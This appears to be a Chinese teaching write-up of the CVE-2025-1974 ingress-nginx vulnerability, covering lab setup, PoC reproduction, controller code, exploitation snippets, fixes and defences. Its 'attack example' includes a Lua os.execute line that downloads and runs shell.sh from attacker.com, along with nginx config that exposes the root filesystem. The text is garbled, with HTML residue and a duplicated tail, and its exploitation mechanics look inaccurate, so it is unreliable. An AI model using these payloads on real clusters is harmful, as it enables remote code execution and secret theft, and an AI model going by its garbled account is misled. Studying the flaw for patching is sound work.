CVE-2025-1974 Ingress-Nginx 漏洞深度分析与教学文档<\/h1>

0x00 漏洞概述<\/h2>
CVE-2025-1974是Kubernetes Ingress-Nginx控制器中发现的一个高危安全漏洞，CVSS评分为9.8。该漏洞允许能够访问pod网络的未认证攻击者在Ingress-Nginx控制器上下文中执行任意代码，可能导致控制器可访问的所有集群范围内的Secrets被泄露。<\/p>

影响版本<\/h3>

ingress-nginx ≤ 1.11.4<\/li>

ingress-nginx = 1.12.0<\/li> <\/ul>

漏洞本质<\/h3>
该漏洞源于Ingress-Nginx控制器在处理AdmissionReview请求时，对用户提供的Ingress资源配置缺乏充分验证，导致攻击者可以通过精心构造的恶意配置实现任意代码执行。<\/p>

0x01 环境准备<\/h2>

1.1 所需工具<\/h3>

Docker：容器运行时环境<\/li>
kubectl：Kubernetes命令行工具<\/li>

Minikube：本地单节点Kubernetes集群<\/li> <\/ul>

1.2 安装步骤<\/h3>

kubectl安装<\/h4>

# Linux<\/span>
<\/span><\/span>curl -LO "https:\/\/dl.k8s.io\/release\/<\/span>$(<\/span>curl -L -s https:\/\/dl.k8s.io\/release\/stable.txt)<\/span>\/bin\/linux\/amd64\/kubectl"<\/span>
<\/span><\/span>sudo install -o root -g root -m 0755<\/span> kubectl \/usr\/local\/bin\/kubectl
<\/span><\/span>
<\/span><\/span># macOS<\/span>
<\/span><\/span>brew install kubectl
<\/span><\/span><\/code><\/pre>Minikube安装<\/h4>
# Linux<\/span>
<\/span><\/span>curl -LO https:\/\/storage.googleapis.com\/minikube\/releases\/latest\/minikube-linux-amd64
<\/span><\/span>sudo install minikube-linux-amd64 \/usr\/local\/bin\/minikube
<\/span><\/span>
<\/span><\/span># macOS<\/span>
<\/span><\/span>brew install minikube
<\/span><\/span><\/code><\/pre>解决root权限问题<\/h4>
sudo -E minikube start --driver=<\/span>docker
<\/span><\/span><\/code><\/pre>国内镜像加速<\/h4>
minikube start --image-mirror-country=<\/span>cn \
<\/span><\/span><\/span><\/span>    --image-repository=<\/span>registry.cn-hangzhou.aliyuncs.com\/google_containers \
<\/span><\/span><\/span><\/span>    --kubernetes-version=<\/span>v1.23.3
<\/span><\/span><\/code><\/pre>1.3 Ingress-Nginx安装<\/h3>

下载受影响版本的部署文件：<\/li>
<\/ol>
wget https:\/\/raw.githubusercontent.com\/kubernetes\/ingress-nginx\/controller-v1.11.3\/deploy\/static\/provider\/baremetal\/deploy.yaml
<\/span><\/span><\/code><\/pre>
修改镜像源（针对国内环境）：<\/li>
<\/ol>
sed -i 's\/k8s.gcr.io\/registry.cn-hangzhou.aliyuncs.com\\/google_containers\/g'<\/span> deploy.yaml
<\/span><\/span><\/code><\/pre>
部署Ingress-Nginx：<\/li>
<\/ol>
kubectl apply -f deploy.yaml
<\/span><\/span><\/code><\/pre>
验证部署：<\/li>
<\/ol>
kubectl get pods -n ingress-nginx
<\/span><\/span><\/code><\/pre>0x02 漏洞复现<\/h2>
2.1 获取POC<\/h3>
git clone https:\/\/github.com\/sandumjacob\/IngressNightmare-POCs.git
<\/span><\/span>cd IngressNightmare-POCs\/CVE-2025-1974
<\/span><\/span><\/code><\/pre>2.2 端口映射<\/h3>
kubectl port-forward -n ingress-nginx svc\/ingress-nginx-controller 8443:443
<\/span><\/span><\/code><\/pre>2.3 执行漏洞利用<\/h3>
curl -k -X POST -H "Content-Type: application\/json"<\/span> -d @poc.json https:\/\/localhost:8443\/networking\/v1\/ingresses
<\/span><\/span><\/code><\/pre>2.4 POC分析<\/h3>
关键poc.json内容结构：<\/p>
{
<\/span><\/span>  "apiVersion"<\/span>: "admission.k8s.io\/v1"<\/span>,
<\/span><\/span>  "kind"<\/span>: "AdmissionReview"<\/span>,
<\/span><\/span>  "request"<\/span>: {
<\/span><\/span>    "uid"<\/span>: "12345"<\/span>,
<\/span><\/span>    "operation"<\/span>: "CREATE"<\/span>,
<\/span><\/span>    "object"<\/span>: {
<\/span><\/span>      "apiVersion"<\/span>: "networking.k8s.io\/v1"<\/span>,
<\/span><\/span>      "kind"<\/span>: "Ingress"<\/span>,
<\/span><\/span>      "metadata"<\/span>: {
<\/span><\/span>        "name"<\/span>: "malicious-ingress"<\/span>,
<\/span><\/span>        "annotations"<\/span>: {
<\/span><\/span>          "nginx.ingress.kubernetes.io\/configuration-snippet"<\/span>: "恶意配置"<\/span>
<\/span><\/span>        }
<\/span><\/span>      },
<\/span><\/span>      "spec"<\/span>: {
<\/span><\/span>        "rules"<\/span>: [{
<\/span><\/span>          "host"<\/span>: "example.com"<\/span>,
<\/span><\/span>          "http"<\/span>: {
<\/span><\/span>            "paths"<\/span>: [{
<\/span><\/span>              "path"<\/span>: "\/"<\/span>,
<\/span><\/span>              "pathType"<\/span>: "Prefix"<\/span>,
<\/span><\/span>              "backend"<\/span>: {
<\/span><\/span>                "service"<\/span>: {
<\/span><\/span>                  "name"<\/span>: "dummy-service"<\/span>,
<\/span><\/span>                  "port"<\/span>: {
<\/span><\/span>                    "number"<\/span>: 80<\/span>
<\/span><\/span>                  }
<\/span><\/span>                }
<\/span><\/span>              }
<\/span><\/span>            }]
<\/span><\/span>          }
<\/span><\/span>        }]
<\/span><\/span>      }
<\/span><\/span>    }
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>0x03 漏洞原理分析<\/h2>
3.1 漏洞位置<\/h3>
漏洞主要存在于internal\/ingress\/controller\/controller.go<\/code>文件的CheckIngress<\/code>方法中。<\/p>
3.2 漏洞调用链<\/h3>

CheckIngress方法<\/strong>：当创建\/更新\/删除Ingress资源时被调用<\/li>
testTemplate方法<\/strong>：将配置写入临时文件并测试语法<\/li>
n.command.Test<\/strong>：使用exec.Command执行nginx -t命令<\/li>
<\/ol>
3.3 关键代码片段<\/h3>
\/\/ internal\/ingress\/controller\/controller.go
<\/span><\/span><\/span><\/span>func<\/span> (n<\/span> *<\/span>NGINXController<\/span>) CheckIngress<\/span>(ing<\/span> *<\/span>networking<\/span>.Ingress<\/span>) error<\/span> {
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    err<\/span> :=<\/span> n<\/span>.testTemplate<\/span>(content<\/span>)
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ internal\/ingress\/controller\/nginx.go
<\/span><\/span><\/span><\/span>func<\/span> (n<\/span> *<\/span>NGINXController<\/span>) testTemplate<\/span>(content<\/span> []byte<\/span>) error<\/span> {
<\/span><\/span>    tmpfile<\/span>, err<\/span> :=<\/span> ioutil<\/span>.TempFile<\/span>(""<\/span>, "nginx-cfg"<\/span>)
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    err<\/span> = n<\/span>.command<\/span>.Test<\/span>(tmpfile<\/span>.Name<\/span>())
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ internal\/ingress\/controller\/util.go
<\/span><\/span><\/span><\/span>func<\/span> (n<\/span> *<\/span>NGINXCommand<\/span>) Test<\/span>(filename<\/span> string<\/span>) error<\/span> {
<\/span><\/span>    out<\/span>, err<\/span> :=<\/span> exec<\/span>.Command<\/span>(n<\/span>.Binary<\/span>, "-c"<\/span>, filename<\/span>, "-t"<\/span>).CombinedOutput<\/span>()
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>0x04 漏洞利用方式<\/h2>
4.1 通过Nginx配置实现RCE<\/h3>
反向代理暴露内部服务<\/h4>
location<\/span> ~ ^\/internal\/(.*)<\/span> {
<\/span><\/span>    proxy_pass<\/span> http:\/\/127.0.0.1:<\/span>$1;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>执行恶意代码(CGI\/SSI)<\/h4>
location<\/span> \/exec<\/span> {
<\/span><\/span>    fastcgi_pass<\/span> unix:\/var\/run\/php-fpm.sock<\/span>;
<\/span><\/span>    include<\/span> fastcgi_params<\/span>;
<\/span><\/span>    fastcgi_param<\/span> SCRIPT_FILENAME<\/span> \/tmp\/malicious.php<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>路径遍历与敏感文件窃取<\/h4>
location<\/span> \/secret<\/span> {
<\/span><\/span>    alias<\/span> \/<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.2 实际攻击示例<\/h3>

通过配置获取敏感信息：<\/li>
<\/ol>
location<\/span> ~ ^\/etc\/(.*)<\/span> {
<\/span><\/span>    alias<\/span> \/<\/span>$1;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
执行系统命令：<\/li>
<\/ol>
location<\/span> \/cmd<\/span> {
<\/span><\/span>    content_by_lua_block<\/span> {
<\/span><\/span>        os.execute("wget<\/span> http:\/\/attacker.com\/shell.sh<\/span> -O<\/span> \/tmp\/shell.sh<\/span> &&<\/span> chmod<\/span> +x<\/span> \/tmp\/shell.sh<\/span> &&<\/span> \/tmp\/shell.sh")<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>0x05 修复方案<\/h2>
5.1 官方修复<\/h3>
升级到以下版本：<\/p>

ingress-nginx ≥ 1.11.5<\/li>
ingress-nginx ≥ 1.12.1<\/li>
<\/ul>
5.2 临时缓解措施<\/h3>

限制validating-webhook端口的网络访问<\/li>
<\/ol>
kubectl patch svc ingress-nginx-controller -n ingress-nginx --type=<\/span>'json'<\/span> -p=<\/span>'[{"op": "replace", "path": "\/spec\/ports\/1", "value": {"name": "webhook", "port": 8443, "protocol": "TCP", "targetPort": "webhook"}}]'<\/span>
<\/span><\/span><\/code><\/pre>
配置网络策略限制访问<\/li>
<\/ol>
apiVersion<\/span>: networking.k8s.io\/v1<\/span>
<\/span><\/span>kind<\/span>: NetworkPolicy<\/span>
<\/span><\/span>metadata<\/span>:
<\/span><\/span>  name<\/span>: restrict-webhook-access<\/span>
<\/span><\/span>  namespace<\/span>: ingress-nginx<\/span>
<\/span><\/span>spec<\/span>:
<\/span><\/span>  podSelector<\/span>:
<\/span><\/span>    matchLabels<\/span>:
<\/span><\/span>      app.kubernetes.io\/name<\/span>: ingress-nginx<\/span>
<\/span><\/span>  ingress<\/span>:
<\/span><\/span>  - from<\/span>:
<\/span><\/span>    - namespaceSelector<\/span>:
<\/span><\/span>        matchLabels<\/span>:
<\/span><\/span>          name<\/span>: kube-system<\/span>
<\/span><\/span>    ports<\/span>:
<\/span><\/span>    - protocol<\/span>: TCP<\/span>
<\/span><\/span>      port<\/span>: 8443<\/span>
<\/span><\/span><\/code><\/pre>0x06 防御建议<\/h2>

最小权限原则<\/strong>：限制Ingress-Nginx控制器的RBAC权限<\/li>
网络隔离<\/strong>：使用NetworkPolicy限制Pod网络访问<\/li>
审计日志<\/strong>：监控AdmissionReview请求<\/li>
定期更新<\/strong>：保持Ingress-Nginx控制器为最新版本<\/li>
配置检查<\/strong>：定期审计Ingress资源配置<\/li>
<\/ol>
0x07 总结<\/h2>
CVE-2025-1974展示了Kubernetes生态系统中Ingress控制器的潜在安全风险，特别是当控制器具有高权限时。该漏洞的利用需要攻击者能够访问Pod网络，但在云原生环境中，这种访问可能比传统网络环境更容易获得。<\/p>
通过深入分析该漏洞，我们可以学到：<\/p>

Kubernetes准入控制机制的安全重要性<\/li>
配置验证过程中的潜在风险点<\/li>
容器网络隔离的必要性<\/li>
最小权限原则在云原生安全中的关键作用<\/li>
<\/ol>
建议所有使用Ingress-Nginx的组织尽快评估风险并采取适当的修复措施。<\/p>

CVE-2025-1974 Ingress-Nginx 漏洞深度分析与教学文档<\/h1>

漏洞本质<\/h3> 该漏洞源于Ingress-Nginx控制器在处理AdmissionReview请求时，对用户提供的Ingress资源配置缺乏充分验证，导致攻击者可以通过精心构造的恶意配置实现任意代码执行。<\/p>

0x01 环境准备<\/h2>

1.2 安装步骤<\/h3>

0x02 漏洞复现<\/h2>

0x03 漏洞原理分析<\/h2>

3.1 漏洞位置<\/h3> 漏洞主要存在于internal\/ingress\/controller\/controller.go<\/code>文件的CheckIngress<\/code>方法中。<\/p>

0x04 漏洞利用方式<\/h2>

4.1 通过Nginx配置实现RCE<\/h3>

0x05 修复方案<\/h2>

漏洞本质<\/h3>
该漏洞源于Ingress-Nginx控制器在处理AdmissionReview请求时，对用户提供的Ingress资源配置缺乏充分验证，导致攻击者可以通过精心构造的恶意配置实现任意代码执行。<\/p>

3.1 漏洞位置<\/h3>
漏洞主要存在于`internal\/ingress\/controller\/controller.go<\/code>文件的CheckIngress<\/code>方法中。<\/p>`